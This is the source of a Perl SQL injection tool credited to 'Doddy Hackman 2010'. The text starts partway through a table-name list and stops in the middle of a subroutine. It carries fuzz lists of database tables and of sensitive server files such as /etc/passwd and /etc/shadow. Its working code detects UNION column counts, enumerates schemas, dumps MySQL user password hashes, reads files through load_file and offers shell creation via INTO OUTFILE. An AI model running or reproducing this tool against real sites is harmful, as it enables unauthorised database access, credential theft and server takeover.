'index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login_admin','login_admins','login_user','login_users','logins','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','Óû§','obb_profiles','order','orders','parol','partner','partners','passes','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user_admin','user_info','user_list','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup
','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','jos_user','table_user','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins');


@buscar3 =('c:/xampp/log.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt
/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/ph
p4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/pro
ftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

&head;
unless(@ARGV == 2) {
&menu;
} else {
&scan($ARGV[0],$ARVG[1]);
}
&finish;

sub menu {
print "[Page] : ";
chomp(my $page=<STDIN>);
print "\n[Bypass : -- /* %00] : ";
chomp(my $bypass = <STDIN>);
print "\n\n";
&scan($page,$bypass);
}

sub scan {
print "[Status] : Scanning.....\n";
$pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print $control;
print "[Status] : Length columns not found\n\n";
<STDIN>;
&head;
&menu;
}
}

sub head {
system 'cls';
print qq(


@      @@   @             
@@     @  @ @@             
@ @@  @  @  @ @   @ @ @@@
@ @   @  @  @@ @ @@@ @  @
@@    @  @  @  @  @   @@@
@ @   @  @  @  @  @  @  @
@@@ @   @@   @@@  @@@ @@@@@




);
}




sub copyright {
print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
}


sub toma {
return $nave->request (GET $_[0])->content;
}


sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


sub length {
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $patha = $1;
chomp $patha;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}

sub ascii {
return join ',',unpack "U*",$_[0];
}

sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}

sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n";
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}
}
}
}

sub menu_options {
print "[Target confirmed] : $_[0]\n";
print "[Bypass] : $_[1]\n\n";

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "[save] : /logs/webs/$save\n\n";
print "\n\n--== information_schema.tables ==--\n\n";
print "[1] : Show tables\n";
print "[2] : Show columns\n";
print "[3] : Show DBS\n";
print "[4] : Show tables with other DB\n";
print "[5] : Show columns with other DB\n";
print "\n\n--== mysql.user ==--\n\n";
print "[6] : Show users\n";
print "\n\n--== Others ==--\n\n";
print "[7] : Fuzzing tables\n";
print "[8] : Fuzzing columns\n";
print "[9] : Fuzzing files with load_file\n";
print "[10] : Dump\n";
print "[11] : Informacion of the server\n";
print "[12] : Create a shell with into outfile\n";
print "[13] : Show Log\n";
print "[14] : Change Target\n";
print "[15] : Exit\n";
print "\n\n[Option] : ";
chomp(my $opcion = <STDIN>);
if ($opcion eq "1") {
schematables($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "2") {
print "\n\n[Tabla] : ";
chomp(my $tabla = <STDIN>);
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($opcion eq "3") {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "4") {
print "\n\n[DAtabase] : ";
chomp(my $data =<STDIN>);
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($opcion eq "5"){
print "\n\n[DB] : ";
chomp(my $db =<STDIN>);
print "\n[Table] : ";
chomp(my $table =<STDIN>);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($opcion eq "6") {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "13") {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($opcion eq "15") {
&finish;
}
elsif ($opcion eq "14") {
&head;
&menu;
}
elsif ($opcion eq "7") {
&tabfuzz($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "8") {
print "\n\n[Tabla] : ";
chomp(my $tab  = <STDIN>);
&colfuzz($_[0],$_[1],$tab,$save);
&reload;
}
elsif ($opcion eq "9") {
&load($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "10") {
print "\n\n[Table to dump] : ";
chomp(my $tabla = <STDIN>);
print "\n[Column 1] : ";
chomp(my $col1 = <STDIN>);
print "\n[Column 2] : ";
chomp(my $col2 = <STDIN>);
print "\n\n";
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($opcion eq "11") {
print "\n\n";
&details($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "12") {
print "\n\n[Full Path Discloure] : ";
chomp(my $path = <STDIN>);
&into($_[0],$_[1],$path,$save);
&reload;
}
else {
&reload;
}
}

sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $resto = $1;
$total = $resto - 17;
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}
}
sub reload {
print "\n\n[+] Finish\n\n";
<STDIN>;
&head;
&menu_options;
}


sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
} else {
print "[-] information_schema = ERROR\n";
}
}

sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) {
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
&reload;
}}}
} else {
print "\n[-] mysql.user = ERROR\n";
}}

sub tabfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[2].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/g) {
my $start = $1; my $end = $2;
print "\n\n[+] Searching tables.....\n\n";
for my $table(@buscar2) {
chomp $table;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
$code = toma($injection);
if ($code =~/ERTOR854/g) {
$count++;
print "[Table Found] : $table\n";
savefile($_[2].".txt","[Table Found] : $table");
}}}
if ($count eq "0") { print "[-] Not found any table\n";
&reload;
}
}

sub colfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[3].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/) {
my $start = $1; my $end = $2;
print "[+] Searching columns for the table $_[2]...\n\n";
savefile($_[3].".txt","[Table] : $_[2]");
for my $columns(@buscar1) {
chomp $columns;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
if ($code =~/ERTOR854/g) {
print "[Column] : $columns\n";
savefile($_[3].".txt","[Column Found] : $columns");
}}
} else {
print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
}
}

sub load {
savefile($_[2].".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($_[1]);
if ($_[0] =~/(.*)hackman(.*)/g) {
